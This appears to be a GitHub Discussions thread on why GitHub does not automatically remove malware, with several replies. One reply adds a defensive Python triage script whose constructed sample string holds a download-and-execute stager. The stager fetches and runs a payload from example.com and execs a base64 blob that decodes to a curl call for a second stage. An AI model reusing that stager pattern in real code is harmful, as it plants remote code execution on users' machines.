Why is malware on GitHub not automatically detected and removed? #187950
Replies: 6 comments
- This is a common and understandable frustration. Here is how GitHub handles malware and some steps you can take:
  Why automatic detection is difficult
  GitHub hosts hundreds of millions of repositories. Automatically scanning all code for malware is computationally extremely challenging because:
  What GitHub does
  GitHub does scan for some categories of malicious content, including:
  What you should do
  Useful links
  For security researchers: if you found malware hosted on GitHub, the Security Lab team at https://securitylab.github.com/ may also be interested.
- GitHub does scan uploaded content for known malware using virus definitions, but it’s not foolproof—new or obfuscated malware can slip through. For issues that aren’t caught automatically, you can report them via GitHub Support or the abuse contact. Once verified, content that violates the Acceptable Use Policy is removed. You can also enable Advanced Security features like secret scanning and code scanning to catch certain threats early.
- Detecting malware at GitHub's scale (over 420 million repositories) is an immense technical challenge. Legitimate use cases: many security researchers host "malware" for educational or defensive purposes. Outright automated banning would hinder legitimate cybersecurity research.
- GitHub's automated systems primarily scan for known vulnerabilities (via Dependabot) and exposed secrets, not general malware. They don't run every file through antivirus engines because that would generate massive false positives for legitimate research, security tools, and obfuscated code. The repository you linked is explicitly named "honeypot" and contains a Python script that antivirus engines flag, likely because it's designed to mimic attack behavior for research. GitHub's policy is to remove content that's actually malicious (like ransomware, stealers), but security research and proof-of-concepts are often permitted unless they cross into active threat distribution. I've reported similar repos before. GitHub Support typically reviews reports manually. If they didn't act, they likely determined it falls under allowed security research. You can file a more specific report citing the exact malicious behavior (e.g., "this script downloads and executes payloads from C2 server X"), not just that it's flagged by VirusTotal. Is the script actively connecting to malicious infrastructure, or is it just a static trap? That distinction matters.
- Lol, all you got were AI-generated nothingburger replies. The truth is that GitHub is filled with low-complexity malware that gets uploaded every day (i.e., template malware code, unverified binaries, suspicious URLs, etc.), and all of these repositories should get detected and marked almost instantly. No one should have to manually scan every file in a repository that has less than 100 stars in 2026. Obviously high-level obfuscation will slip by every now and then, but this website has a major malware issue that needs to be addressed.
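Two of the replies above converge on the same practical point: the reply about reporting says a report should cite concrete behaviour ("downloads and executes payloads from C2 server X") rather than a VirusTotal hit, and the reply above argues that low-complexity malware (template code, encoded blobs, suspicious URLs) is mechanically detectable. The script below is an added illustration of the triage a reporter can do before filing; it is not GitHub's scanner, not code from this discussion, and not code from the repository linked in the question. It walks a Python file's AST (standard library only) and reports download-and-execute chains, exec()/eval() over decoded data, literal URLs, and long base64 blobs decoded in place. The two sample scripts and the example.com URLs in them are constructed placeholders, not real infrastructure.

```python
"""Static triage of a Python file for the behaviours a specific abuse report needs.

Added example, not GitHub's tooling. Heuristics only: findings are leads to cite
in a report, not a verdict, and aliased imports (from os import system as s)
will evade the name matching below.
"""
from __future__ import annotations

import ast
import base64
import re
from dataclasses import dataclass

# Calls that pull bytes from the network. Qualified where the bare name is too
# noisy (dict.get), bare where the qualified form varies (urllib.request.urlopen).
FETCH_CALLS = {"urlopen", "urlretrieve", "requests.get", "requests.post"}
# Calls that execute data or spawn a process.
EXEC_CALLS = {"exec", "eval", "system", "os.system", "Popen", "subprocess.Popen",
              "subprocess.run", "subprocess.call", "subprocess.check_output"}
# Calls that turn an opaque blob back into code or a URL.
DECODE_CALLS = {"b64decode", "base64.b64decode", "a85decode", "base64.a85decode",
                "zlib.decompress"}
URL_RE = re.compile(r"https?://[^\s'\"]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


def _call_name(node: ast.Call) -> str:
    """'exec', 'os.system' or 'urlopen'-style name for a call node."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        base = f.value.id + "." if isinstance(f.value, ast.Name) else ""
        return base + f.attr
    return ""


def _has_call(node: ast.AST, names: set[str]) -> bool:
    return any(isinstance(n, ast.Call) and _call_name(n) in names for n in ast.walk(node))


def triage(source: str) -> list[Finding]:
    """Return indicators sorted by line; an empty list means nothing obvious."""
    tree = ast.parse(source)
    findings: list[Finding] = []
    fetch_lines: list[int] = []
    exec_lines: list[int] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in FETCH_CALLS:
                fetch_lines.append(node.lineno)
            if name in EXEC_CALLS:
                exec_lines.append(node.lineno)
                # exec(base64.b64decode(...)) is the classic low-effort stager.
                if any(_has_call(arg, DECODE_CALLS) for arg in node.args):
                    findings.append(Finding(node.lineno, "obfuscated-exec",
                                            f"{name}() runs decoded data"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                findings.append(Finding(node.lineno, "url", url))
            if B64_RE.fullmatch(node.value):
                try:
                    blob = base64.b64decode(node.value, validate=True)
                except ValueError:  # binascii.Error is a ValueError
                    continue
                # Decode so the report can name what the blob hides (e.g. a stage-2 URL).
                urls = URL_RE.findall(blob.decode("latin-1"))
                findings.append(Finding(node.lineno, "encoded-payload",
                                        f"decodes to {len(blob)} bytes, urls={urls}"))
    if fetch_lines and exec_lines:
        findings.append(Finding(min(fetch_lines), "download-and-execute",
                                f"fetch at {sorted(fetch_lines)}, "
                                f"execute/spawn at {sorted(exec_lines)}"))
    return sorted(findings, key=lambda f: f.line)


# Constructed sample (not from any real repository): stages a binary from a
# placeholder URL and exec()s a base64 blob that itself points at a second URL.
_INNER = b'import os; os.system("curl http://example.com/stage2")'
SAMPLE_SUSPICIOUS = f'''
import base64, urllib.request, subprocess
PAYLOAD = "{base64.b64encode(_INNER).decode()}"
def run():
    data = urllib.request.urlopen("http://example.com/stage1").read()
    open("/tmp/s", "wb").write(data)
    subprocess.run(["/tmp/s"])
    exec(base64.b64decode(PAYLOAD))
'''

# Constructed benign control: file I/O and JSON, no network, no exec.
SAMPLE_BENIGN = '''
import json
def load(path):
    with open(path) as f:
        return json.load(f)
'''

if __name__ == "__main__":
    for f in triage(SAMPLE_SUSPICIOUS):
        print(f"line {f.line}: {f.kind}: {f.detail}")
```

The output for the constructed sample is the material a specific report needs: line 5 fetches from a named URL, line 7 runs what it fetched, line 8 exec()s a decoded blob, and the blob itself names a second URL. Run it over every `.py` file in a clone, then confirm the network behaviour in a sandbox before claiming "actively connects to X"; a static match alone still does not separate a deliberately inert honeypot from a live stager.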
- I wrote an article on this topic a few days ago: I discovered a large-scale malware distribution campaign on GitHub
- Topic area: Question. Body:
Today I again found malware in a "honeypot" repository; see this directory: https://github.com/prider7/codewars-challenges/tree/master/subsistential
My GitHub Support messages are ignored, and I ask myself:
Why is malware on GitHub not automatically detected and removed?
I don't get it.